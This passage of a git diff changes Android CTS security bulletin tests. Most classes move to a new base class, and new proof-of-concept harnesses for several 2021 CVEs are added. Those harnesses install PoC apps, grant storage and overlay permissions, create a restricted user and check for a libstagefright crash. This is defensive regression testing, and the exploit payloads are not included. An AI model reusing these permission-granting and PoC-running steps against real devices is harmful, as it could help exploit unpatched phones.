+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0925.java
@@ -15,14 +15,18 @@
*/
package android.security.cts;
+
import android.platform.test.annotations.AsbSecurityTest;
+
import com.android.compatibility.common.util.CrashUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0925 extends SecurityTestCase {
+public class CVE_2021_0925 extends NonRootSecurityTestCase {
/**
* Vulnerability Behaviour: SIGSEGV in self
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0928.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0928.java
index cbf108883a1..d83f26a9529 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0928.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0928.java
@@ -23,7 +23,7 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.log.LogUtil.CLog;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import org.junit.Assert;
import org.junit.Before;
@@ -31,7 +31,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0928 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_0928 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.CVE_2021_0928";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "CVE-2021-0928.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0953.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0953.java
index ecb6bdd3cd4..833b93aa854 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0953.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0953.java
@@ -19,13 +19,13 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0953 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_0953 extends NonRootSecurityTestCase {
@AsbSecurityTest(cveBugId = 184046278)
@Test
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0954.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0954.java
index 5532e4602a4..847feefa489 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0954.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0954.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2021 The Android Open Source Project
+ * Copyright (C) 2022 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -16,43 +16,39 @@
package android.security.cts;
-import android.platform.test.annotations.AppModeFull;
+import static org.junit.Assume.assumeNoException;
+
import android.platform.test.annotations.AsbSecurityTest;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test;
-import org.junit.Assert;
-import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0954 extends BaseHostJUnit4Test {
- private static final String TEST_PKG = "android.security.cts.cve_2021_0954";
- private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
- private static final String TEST_APP = "CVE-2021-0954.apk";
- private ITestDevice device;
-
- @Before
- public void setUp() throws Exception {
- device = getDevice();
- uninstallPackage(device, TEST_PKG);
-
- /* Wake up the screen */
- AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
- AdbUtils.runCommandLine("input keyevent KEYCODE_MENU", device);
- AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
- }
+public class CVE_2021_0954 extends NonRootSecurityTestCase {
+ private static final String TEST_PKG = "android.security.cts.CVE_2021_0954";
- @AppModeFull
@AsbSecurityTest(cveBugId = 143559931)
@Test
public void testPocCVE_2021_0954() throws Exception {
- installPackage(TEST_APP);
- AdbUtils.runCommandLine("pm grant " + TEST_PKG + " android.permission.SYSTEM_ALERT_WINDOW",
- device);
- runDeviceTests(TEST_PKG, TEST_CLASS, "testVulnerableActivityPresence");
+ try {
+ ITestDevice device = getDevice();
+ uninstallPackage(device, TEST_PKG);
+
+ /* Wake up the screen */
+ AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_MENU", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
+
+ installPackage("CVE-2021-0954.apk");
+ AdbUtils.runCommandLine(
+ "pm grant " + TEST_PKG + " android.permission.SYSTEM_ALERT_WINDOW", device);
+ runDeviceTests(TEST_PKG, TEST_PKG + "." + "DeviceTest", "testOverlayButtonPresence");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0956.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0956.java
index 80fa239bc71..eddde21aacf 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0956.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0956.java
@@ -17,14 +17,17 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
import com.android.compatibility.common.util.CrashUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0956 extends SecurityTestCase {
+public class CVE_2021_0956 extends NonRootSecurityTestCase {
/**
* b/189942532
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0965.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0965.java
index 65934f2741f..b7b0e2bdabc 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0965.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0965.java
@@ -21,7 +21,7 @@ import android.platform.test.annotations.AppModeFull;
import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import org.junit.Assert;
import org.junit.Before;
@@ -29,7 +29,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_0965 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_0965 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.CVE_2021_0965";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "CVE-2021-0965.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_1906.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_1906.java
index bfa056b2311..9a56b0c1c2c 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_1906.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_1906.java
@@ -19,12 +19,15 @@ import static org.junit.Assert.*;
import static org.junit.Assume.*;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_1906 extends SecurityTestCase {
+public class CVE_2021_1906 extends NonRootSecurityTestCase {
/**
* CVE-2021-1906
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_30351.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_30351.java
index 415e2b1ad93..7b4712f2d5a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_30351.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_30351.java
@@ -15,15 +15,17 @@
*/
package android.security.cts;
-import android.platform.test.annotations.SecurityTest;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import android.platform.test.annotations.AsbSecurityTest;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_30351 extends SecurityTestCase {
+public class CVE_2021_30351 extends NonRootSecurityTestCase {
/**
* CVE-2021-30351
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39623.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39623.java
new file mode 100644
index 00000000000..aaaa502f934
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39623.java
@@ -0,0 +1,56 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.Arrays;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_39623 extends NonRootSecurityTestCase {
+
+ /**
+ * b/194105348
+ * Vulnerability Behaviour: SIGSEGV in self
+ * Vulnerable Library: libstagefright (As per AOSP code)
+ * Vulnerable Function: doRead (As per AOSP code)
+ */
+ @AsbSecurityTest(cveBugId = 194105348)
+ @Test
+ public void testPocCVE_2021_39623() throws Exception {
+ String binaryName = "CVE-2021-39623";
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName)
+ .setBacktraceIncludes(new BacktraceFilterPattern("libstagefright",
+ "android::SimpleDecodingSource::doRead"));
+ String signals[] = {CrashUtils.SIGSEGV};
+ testConfig.config.setSignals(signals);
+ testConfig.inputFilesDestination = AdbUtils.TMP_PATH;
+ String inputFiles[] = {"cve_2021_39623.ogg"};
+ testConfig.inputFiles = Arrays.asList(inputFiles);
+ testConfig.arguments = AdbUtils.TMP_PATH + inputFiles[0];
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39626.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39626.java
index 3b12ce5a926..c47ebf119b6 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39626.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39626.java
@@ -18,7 +18,7 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -26,7 +26,7 @@ import org.junit.runner.RunWith;
import org.junit.Test;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_39626 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_39626 extends NonRootSecurityTestCase {
static final String TEST_APP = "CVE-2021-39626.apk";
static final String TEST_PKG = "android.security.cts.CVE_2021_39626";
static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39664.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39664.java
index 6cac004b175..29de04e3d0c 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39664.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39664.java
@@ -20,16 +20,17 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import org.junit.runner.RunWith;
import org.junit.Test;
+import org.junit.runner.RunWith;
import java.util.Arrays;
import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_39664 extends SecurityTestCase {
+public class CVE_2021_39664 extends NonRootSecurityTestCase {
/**
* b/203938029
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39665.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39665.java
index 519bd242f6a..6b1ae208f7a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39665.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39665.java
@@ -20,15 +20,16 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import java.util.regex.Pattern;
-
-import org.junit.runner.RunWith;
import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_39665 extends SecurityTestCase {
+public class CVE_2021_39665 extends NonRootSecurityTestCase {
/**
* b/204077881
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39675.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39675.java
index 8f12b522fad..eb2c5ab7d07 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39675.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39675.java
@@ -18,13 +18,14 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import org.junit.runner.RunWith;
import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_39675 extends SecurityTestCase {
+public class CVE_2021_39675 extends NonRootSecurityTestCase {
/**
* b/205729183
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39692.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39692.java
index 444f1a55a60..f75514208c6 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39692.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39692.java
@@ -23,13 +23,13 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_39692 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_39692 extends NonRootSecurityTestCase {
@AppModeFull
@AsbSecurityTest(cveBugId = 209611539)
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39700.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39700.java
index acc6a2ed00f..63235ecf78b 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39700.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39700.java
@@ -23,7 +23,7 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import org.junit.Test;
import org.junit.runner.RunWith;
@@ -31,7 +31,7 @@ import org.junit.runner.RunWith;
import java.io.File;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_39700 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_39700 extends NonRootSecurityTestCase {
/**
* b/201645790
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39701.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39701.java
index f8d6fe6f1d5..5e78a90cd85 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39701.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39701.java
@@ -18,7 +18,7 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -26,7 +26,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_39701 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_39701 extends NonRootSecurityTestCase {
@AsbSecurityTest(cveBugId = 212286849)
@Test
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39702.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39702.java
index cf8a688976b..cf5d47c3dd8 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39702.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39702.java
@@ -21,14 +21,14 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import org.junit.Assert;
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_39702 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_39702 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.CVE_2021_39702";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "CVE-2021-39702.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39704.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39704.java
new file mode 100644
index 00000000000..9aebd152144
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39704.java
@@ -0,0 +1,57 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_39704 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 209965481)
+ @Test
+ public void testPocCVE_2021_39704() {
+ try {
+ final String testPkg = "android.security.cts.CVE_2021_39704";
+
+ ITestDevice device = getDevice();
+
+ AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_MENU", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
+
+ installPackage("CVE-2021-39704.apk");
+ AdbUtils.runCommandLine(
+ "pm revoke " + "android.security.cts.CVE_2021_39704 "
+ + "android.permission.ACCESS_COARSE_LOCATION",
+ device);
+
+ runDeviceTests(testPkg, testPkg + "." + "DeviceTest",
+ "testdeleteNotificationChannelGroup");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39706.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39706.java
index cd8afef86e4..ecf096f31d1 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39706.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39706.java
@@ -21,7 +21,7 @@ import static org.junit.Assume.assumeTrue;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -29,7 +29,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_39706 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_39706 extends NonRootSecurityTestCase {
@AsbSecurityTest(cveBugId = 200164168)
@Test
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39707.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39707.java
new file mode 100644
index 00000000000..e40cea6bbfb
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39707.java
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_39707 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 200688991)
+ @Test
+ public void testPocCVE_2021_39707() {
+ ITestDevice device = getDevice();
+ final String testPkg = "android.security.cts.CVE_2021_39707";
+ int userId = -1;
+ try {
+ // Wake up the screen
+ AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_MENU", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
+
+ // Create restricted user
+ String commandOutput = AdbUtils.runCommandLine(
+ "pm create-user --restricted CVE_2021_39707_RestrictedUser", device);
+
+ // Extract user id of the restricted user
+ String[] tokens = commandOutput.split("\\s+");
+ assumeTrue(tokens.length > 0);
+ assumeTrue(tokens[0].equals("Success:"));
+ userId = Integer.parseInt(tokens[tokens.length - 1]);
+
+ // Install PoC application
+ installPackage("CVE-2021-39707.apk");
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testAppRestrictionsFragment");
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ // Back to home screen after test
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
+ if (userId != -1) {
+ // Remove restricted user
+ AdbUtils.runCommandLine("pm remove-user " + userId, device);
+ }
+ } catch (Exception e) {
+ // ignore all exceptions
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39794.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39794.java
index 0ae1efa8e83..d67b4e6d53f 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39794.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39794.java
@@ -18,7 +18,7 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -27,7 +27,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2021_39794 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2021_39794 extends NonRootSecurityTestCase {
static final String TEST_APP = "CVE-2021-39794-test.apk";
static final String RECEIVER_APP = "CVE-2021-39794-receiver.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39795.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39795.java
new file mode 100644
index 00000000000..a427e65169a
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39795.java
@@ -0,0 +1,73 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_39795 extends NonRootSecurityTestCase {
+ private static final String TEST_PKG = "android.security.cts.CVE_2021_39795";
+ private static final String DIR_PATH = "/storage/emulated/0/Android/data/CVE-2021-39795-dir";
+
+ @AsbSecurityTest(cveBugId = 201667614)
+ @Test
+ public void testPocCVE_2021_39795() {
+ ITestDevice device = null;
+ try {
+ device = getDevice();
+
+ /* Wake up the screen */
+ AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_MENU", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
+
+ installPackage("CVE-2021-39795.apk");
+
+ /* Make a directory inside "Android/data" folder */
+ AdbUtils.runCommandLine("mkdir " + DIR_PATH, device);
+
+ /* Allow Read and Write to external storage */
+ AdbUtils.runCommandLine(
+ "pm grant " + TEST_PKG + " android.permission.READ_EXTERNAL_STORAGE", device);
+ AdbUtils.runCommandLine(
+ "pm grant " + TEST_PKG + " android.permission.WRITE_EXTERNAL_STORAGE", device);
+
+ /* Allow the app to manage all files */
+ AdbUtils.runCommandLine(
+ "appops set --uid " + TEST_PKG + " MANAGE_EXTERNAL_STORAGE allow", device);
+
+ runDeviceTests(TEST_PKG, TEST_PKG + ".DeviceTest", "testFilePresence");
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ AdbUtils.runCommandLine("rm -rf " + DIR_PATH, device);
+ } catch (Exception e) {
+ // ignore the exceptions
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39796.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39796.java
index f90cae0c295..07fa92757d9 100644
